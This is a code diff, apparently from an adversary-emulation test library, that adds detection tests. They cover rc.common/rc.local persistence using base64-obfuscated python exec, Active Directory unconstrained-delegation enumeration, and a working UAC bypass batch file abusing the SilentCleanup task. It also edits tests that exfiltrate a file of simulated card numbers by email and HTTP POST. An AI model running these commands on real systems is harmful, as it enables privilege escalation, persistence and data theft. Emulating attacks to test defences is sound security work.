+          filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+          sudo chmod +x /etc/rc.common
+        cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+          && sudo rm $origfilename;fi
+
+'
+    - name: rc.local
+      auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+      description: 'Modify rc.local
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+          sudo chmod +x /etc/rc.local
+        cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+          sudo rm $origfilename;fi
+
+'
  T1542.004:
    technique:
      created: '2020-10-20T00:05:48.790Z'
@@ -49382,6 +49513,49 @@ discovery:

 '
        name: command_prompt
+    - name: Enumerate Active Directory for Unconstrained Delegation
+      auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+      description: |
+        Attackers may attempt to query for computer objects with the UserAccountControl property
+        'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+        More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+        Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+      supported_platforms:
+      - windows
+      input_arguments:
+        domain:
+          description: Domain FQDN
+          type: String
+          default: contoso.com
+        uac_prop:
+          description: UAC Property to search
+          type: String
+          default: 524288
+      dependencies:
+      - description: 'PowerShell ActiveDirectory Module must be installed
+
+'
+        prereq_command: |
+          Try {
+              Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+              exit 0
+          }
+          Catch {
+              exit 1
+          }
+        get_prereq_command: |
+          if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+            Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+          } else {
+            Install-WindowsFeature RSAT-AD-PowerShell
+          }
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
+          -Server #{domain}
+
+'
  T1069.002:
    technique:
      external_references:
@@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p


 ```powershell
-"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
 ```


@@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p


 ```powershell
-Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
 ```


@@ -109,7 +109,7 @@ atomic_tests:
  supported_platforms:
  - windows
  input_arguments:
-    input_file: 
+    input_file:
      description: Path of the XLSM file
      type: path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
@@ -125,10 +125,9 @@ atomic_tests:
      description: SMTP Server IP Address
      type: string
      default: 127.0.0.1
-  dependency_executor_name: powershell
  executor:
    command: |
-      "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+      Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
    name: powershell

 - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
@@ -147,8 +146,7 @@ atomic_tests:
      description: Destination IP address
      type: string
      default: 127.0.0.1
-  dependency_executor_name: powershell
  executor:
    command: |
-      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
    name: powershell
@@ -12,6 +12,10 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr

 - [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)

+- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon)
+
+- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
+

 <br/>

@@ -38,4 +42,68 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e



+<br/>
+<br/>
+
+## Atomic Test #2 - rc.common
+Modify rc.common
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+sudo chmod +x /etc/rc.common
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - rc.local
+Modify rc.local
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+sudo chmod +x /etc/rc.local
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+```
+
+
+
+
+
 <br/>
@@ -15,3 +15,42 @@ atomic_tests:
    elevation_required: true
    name: bash

+
+- name: rc.common
+  auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+  description: |
+    Modify rc.common
+
+  supported_platforms:
+    - linux
+  executor:
+    name: bash
+    elevation_required: true 
+    command: | 
+      filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+      printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+      printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+      sudo chmod +x /etc/rc.common
+    cleanup_command: | 
+      origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+
+- name: rc.local
+  auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+  description: |
+    Modify rc.local
+
+  supported_platforms:
+    - linux
+  executor:
+    name: bash
+    elevation_required: true 
+    command: | 
+      filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+      printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+      printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+      sudo chmod +x /etc/rc.local
+    cleanup_command: | 
+      origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+
@@ -24,6 +24,8 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code

 - [Atomic Test #9 - Enumerate Default Domain Admin Details (Domain)](#atomic-test-9---enumerate-default-domain-admin-details-domain)

+- [Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation](#atomic-test-10---enumerate-active-directory-for-unconstrained-delegation)
+

 <br/>

@@ -344,4 +346,59 @@ net user administrator /domain



+<br/>
+<br/>
+
+## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation
+Attackers may attempt to query for computer objects with the UserAccountControl property
+'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| domain | Domain FQDN | String | contoso.com|
+| uac_prop | UAC Property to search | String | 524288|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: PowerShell ActiveDirectory Module must be installed
+##### Check Prereq Commands:
+```powershell
+Try {
+    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+    exit 0
+}
+Catch {
+    exit 1
+} 
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+  Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
 <br/>
@@ -69,7 +69,7 @@ atomic_tests:
    name: powershell
 - name: Adfind -Listing password policy
  auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
-  description: | 
+  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
    reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
  supported_platforms:
@@ -93,7 +93,7 @@ atomic_tests:
    name: command_prompt
 - name: Adfind - Enumerate Active Directory Admins
  auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
-  description: | 
+  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
    reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
  supported_platforms:
@@ -117,7 +117,7 @@ atomic_tests:
    name: command_prompt
 - name: Adfind - Enumerate Active Directory User Objects
  auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
-  description: | 
+  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
@@ -141,7 +141,7 @@ atomic_tests:
    name: command_prompt
 - name: Adfind - Enumerate Active Directory Exchange AD Objects
  auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
-  description: | 
+  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
@@ -173,3 +173,44 @@ atomic_tests:
    command: |
      net user administrator /domain
    name: command_prompt
+
+- name: Enumerate Active Directory for Unconstrained Delegation
+  auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+  description: |
+    Attackers may attempt to query for computer objects with the UserAccountControl property
+    'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+    More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+    Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+  supported_platforms:
+  - windows
+  input_arguments:
+    domain:
+      description: Domain FQDN
+      type: String
+      default: contoso.com
+    uac_prop:
+      description: UAC Property to search
+      type: String
+      default: 524288
+  dependencies:
+  - description: |
+      PowerShell ActiveDirectory Module must be installed
+    prereq_command: |
+      Try {
+          Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+          exit 0
+      }
+      Catch {
+          exit 1
+      }
+    get_prereq_command: |
+      if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+        Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+      } else {
+        Install-WindowsFeature RSAT-AD-PowerShell
+      }
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
@@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia

 - [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe)

+- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task)
+

 <br/>

@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En



+<br/>
+<br/>
+
+## Atomic Test #9 - Bypass UAC using SilentCleanup task
+Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+For example, we can set the windir registry kye to: "cmd /k REM "
+
+And forcefully run SilentCleanup task:
+
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_path | Path to the bat file | String | PathToAtomicsFolder&#92;T1548.002&#92;src&#92;T1548.002.bat|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+#{file_path}
+```
+
+
+
+
+
+
 <br/>
@@ -162,3 +162,29 @@ atomic_tests:
      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
    name: command_prompt
    elevation_required: true
+- name: Bypass UAC using SilentCleanup task
+  auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+  description: |
+    Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+    
+    There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+    
+    For example, we can set the windir registry kye to: "cmd /k REM "
+   
+    And forcefully run SilentCleanup task:
+    
+    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+    
+    REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_path:
+      description: Path to the bat file
+      type: String
+      default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+  executor:
+    command: |
+      #{file_path}
+    name: command_prompt
+    elevation_required: false
@@ -0,0 +1,8 @@
+@echo off
+mode 18,1
+color FE
+reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul
+timeout /t 2 >nul
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
+timeout /t 3 >nul
+reg delete "HKCU\Environment" /v "windir" /F
@@ -704,3 +704,7 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
 788e0019-a483-45da-bcfe-96353d46820f
 58004e22-022c-4c51-b4a8-2b85ac5c596b
 0b2f9520-a17a-4671-9dba-3bd034099fff
+28104f8a-4ff1-4582-bcf6-699dce156608
+46f8dbe9-22a5-4770-8513-66119c5be63b
+c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+126f71af-e1c9-405c-94ef-26a47b16c102